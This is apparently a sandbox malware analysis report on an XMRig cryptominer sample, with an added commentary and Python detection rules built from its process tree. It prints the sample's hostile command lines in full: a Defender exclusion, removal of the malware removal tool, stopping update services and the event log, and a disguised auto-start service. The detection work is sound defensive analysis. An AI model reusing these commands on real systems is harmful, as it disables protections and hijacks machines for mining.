Windows Analysis Report
nW2oopMIdg.exe

Overview

General Information

Sample name:nW2oopMIdg.exe
renamed because original name is a hash value
Original sample name:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c.exe
Analysis ID:1587400
MD5:990a3f3b1273510f210fb9b541da219f
SHA1:33e536c5b4bdb6f6042f93445dffd8a3ad488e8b
SHA256:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • nW2oopMIdg.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\nW2oopMIdg.exe" MD5: 990A3F3B1273510F210FB9B541DA219F)
    • powershell.exe (PID: 5988 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1896 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5528 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 3208 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1560 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6464 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6180 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6632 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1976 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2200 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6616 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7084 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 1276 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 2992 cmdline: C:\Windows\system32\sc.exe delete "GeekBrains" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3056 cmdline: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5436 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5528 cmdline: C:\Windows\system32\sc.exe start "GeekBrains" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Lightshot.exe (PID: 3524 cmdline: C:\ProgramData\Screenshots\Lightshot.exe MD5: 990A3F3B1273510F210FB9B541DA219F)
    • powershell.exe (PID: 6572 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5456 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5836 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 1868 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2992 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6536 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 348 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1896 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1120 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6524 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6716 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6300 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7056 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 2284 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 4508 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup
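The process tree above is the whole playbook in order: a Defender exclusion for the user profile and C:\ProgramData plus every .exe, removal of the Malicious Software Removal Tool update (KB890830), stopping the Windows Update services (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc) and the event log, zeroing the standby and hibernate timeouts so the miner is never suspended, a copy of the sample to C:\ProgramData\Screenshots\Lightshot.exe (same MD5 as nW2oopMIdg.exe) registered as the auto-start service "GeekBrains", and finally dialer.exe started as the host for the injected miner; the system processes listed beneath dialer.exe are the injection targets the signatures refer to. The Python below is an added example, not part of the Joe Sandbox report: it runs one detection rule per step over process-creation records constructed from the command lines above. The ProcEvent field names are an assumption standing in for Sysmon Event ID 1 or Security 4688 fields.

```python
"""Detection logic for the steps in the process tree above.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from
the command lines and parent/child relations the report lists; the ProcEvent
field names are an assumption standing in for Sysmon EID 1 / Security 4688 fields.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent


SAMPLE = r"C:\Users\user\Desktop\nW2oopMIdg.exe"
EVENTS = [  # constructed from the report's tree, one representative per technique
    ProcEvent(5988, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) "
              "-ExclusionExtension '.exe' -Force", SAMPLE),
    ProcEvent(5528, r"C:\Windows\System32\wusa.exe",
              "wusa /uninstall /kb:890830 /quiet /norestart", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(3208, r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop UsoSvc", SAMPLE),
    ProcEvent(5436, r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop eventlog", SAMPLE),
    ProcEvent(1976, r"C:\Windows\System32\powercfg.exe",
              r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0", SAMPLE),
    ProcEvent(3056, r"C:\Windows\System32\sc.exe",
              r'C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"',
              SAMPLE),
    ProcEvent(1276, r"C:\Windows\System32\dialer.exe", r"C:\Windows\system32\dialer.exe", SAMPLE),
    ProcEvent(924, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM", r"C:\Windows\System32\dialer.exe"),
    # benign control (constructed): the normal parent of svchost.exe is services.exe
    ProcEvent(1000, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k netsvcs -p", r"C:\Windows\System32\services.exe"),
]

UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
USER_WRITABLE = ("\\programdata\\", "\\users\\", "\\appdata\\", "\\temp\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def argv(cmdline: str) -> list:
    """Split a Windows command line, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def sc_args(ev, verb):
    """[verb, arg, ...] (lower-cased) if ev is 'sc.exe <verb> ...', else None."""
    a = [t.lower() for t in argv(ev.cmdline)]
    return a[1:] if basename(ev.image) == "sc.exe" and len(a) > 2 and a[1] == verb else None


def defender_exclusion(ev):
    return basename(ev.image) == "powershell.exe" and bool(
        re.search(r"add-mppreference.*-exclusion(path|extension|process)", ev.cmdline, re.I))


def msrt_uninstall(ev):  # KB890830 is the Malicious Software Removal Tool
    return basename(ev.image) == "wusa.exe" and bool(
        re.search(r"/uninstall\s+/kb:890830", ev.cmdline, re.I))


def sc_stop_update_service(ev):
    a = sc_args(ev, "stop")
    return bool(a) and a[1] in UPDATE_SERVICES


def sc_stop_eventlog(ev):
    a = sc_args(ev, "stop")
    return bool(a) and a[1] == "eventlog"


def powercfg_no_sleep(ev):
    return basename(ev.image) == "powercfg.exe" and bool(
        re.search(r"-(standby|hibernate)-timeout-(ac|dc)\s+0\b", ev.cmdline, re.I))


def service_in_user_writable_path(ev):
    a = sc_args(ev, "create")
    if not a:
        return False
    for i, tok in enumerate(a):  # sc accepts both 'binpath= X' and 'binpath=X'
        if tok.startswith("binpath="):
            path = tok[len("binpath="):] or (a[i + 1] if i + 1 < len(a) else "")
            return any(marker in path for marker in USER_WRITABLE)
    return False


def uncommon_svchost_parent(ev):
    # Production use needs an allowlist; here the only accepted parent is
    # services.exe, which is what the report's Sigma hit on PID 924 is about.
    return basename(ev.image) == "svchost.exe" and basename(ev.parent_image) != "services.exe"


RULES = {f.__name__: f for f in (defender_exclusion, msrt_uninstall, sc_stop_update_service,
                                 sc_stop_eventlog, powercfg_no_sleep,
                                 service_in_user_writable_path, uncommon_svchost_parent)}


def evaluate(events):
    """Map pid -> sorted names of the rules that fired on that process."""
    hits = defaultdict(list)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[ev.pid].append(name)
    return {pid: sorted(names) for pid, names in hits.items()}


def techniques_seen(events):
    """Distinct rules fired across the tree; several together is the miner playbook."""
    return sorted({n for names in evaluate(events).values() for n in names})


if __name__ == "__main__":
    for pid, names in evaluate(EVENTS).items():
        print(pid, ", ".join(names))
    print(len(techniques_seen(EVENTS)), "of", len(RULES), "techniques seen")
```

Each rule alone has benign hits (administrators do run powercfg and sc), so the useful signal is the number of distinct techniques fired under one parent within a short window, which is what techniques_seen() counts.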
Malware family

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Yara matches (Source | Rule | Description | Author; matched strings are listed under each hit)

PCAP:
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Memory dumps:
00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
• 0x37eb98:$a1: mining.set_target
• 0x370e20:$a2: XMRIG_HOSTNAME
• 0x373748:$a3: Usage: xmrig [OPTIONS]
• 0x370df8:$a4: XMRIG_VERSION
Process Memory Space: dialer.exe PID: 4508 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Process Memory Space: dialer.exe PID: 4508 | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
• 0x224ff:$a1: mining.set_target
• 0x1eca8:$a2: XMRIG_HOSTNAME
• 0x1fa20:$a3: Usage: xmrig [OPTIONS]
• 0x1ec89:$a4: XMRIG_VERSION

Unpacked PE files:
65.2.dialer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
65.2.dialer.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
• 0x37ef98:$a1: mining.set_target
• 0x371220:$a2: XMRIG_HOSTNAME
• 0x373b48:$a3: Usage: xmrig [OPTIONS]
• 0x3711f8:$a4: XMRIG_VERSION
65.2.dialer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
• 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
65.2.dialer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
• 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
• 0x3cd180:$s3: \\.\WinRing0_
• 0x376148:$s4: pool_wallet
• 0x3705f0:$s5: cryptonight
• 0x370600:$s5: cryptonight
• 0x370610:$s5: cryptonight
• 0x370620:$s5: cryptonight
• 0x370638:$s5: cryptonight
• 0x370648:$s5: cryptonight
• 0x370658:$s5: cryptonight
• 0x370670:$s5: cryptonight
• 0x370680:$s5: cryptonight
• 0x370698:$s5: cryptonight
• 0x3706b0:$s5: cryptonight
• 0x3706c0:$s5: cryptonight
• 0x3706d0:$s5: cryptonight
• 0x3706e0:$s5: cryptonight
• 0x3706f8:$s5: cryptonight
• 0x370710:$s5: cryptonight
• 0x370720:$s5: cryptonight
• 0x370730:$s5: cryptonight

          Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 1976, ProcessName: powercfg.exe

          System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5988, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 1276, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", ProcessId: 3056, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5988, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\nW2oopMIdg.exe", ParentImage: C:\Users\user\Desktop\nW2oopMIdg.exe, ParentProcessId: 1984, ParentProcessName: nW2oopMIdg.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5436, ProcessName: sc.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T10:36:03.317801+0100 | 2047928 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 63299 | 1.1.1.1 | 53 | UDP
2025-01-10T10:35:51.244025+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 49704 | 141.94.96.71 | 80 | TCP

          AV Detection

Source: C:\ProgramData\Screenshots\Lightshot.exe; ReversingLabs: Detection: 65%
Source: nW2oopMIdg.exe; Virustotal: Detection: 62%
Source: nW2oopMIdg.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability

          Bitcoin Miner

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: dialer.exe PID: 4508, type: MEMORYSTR
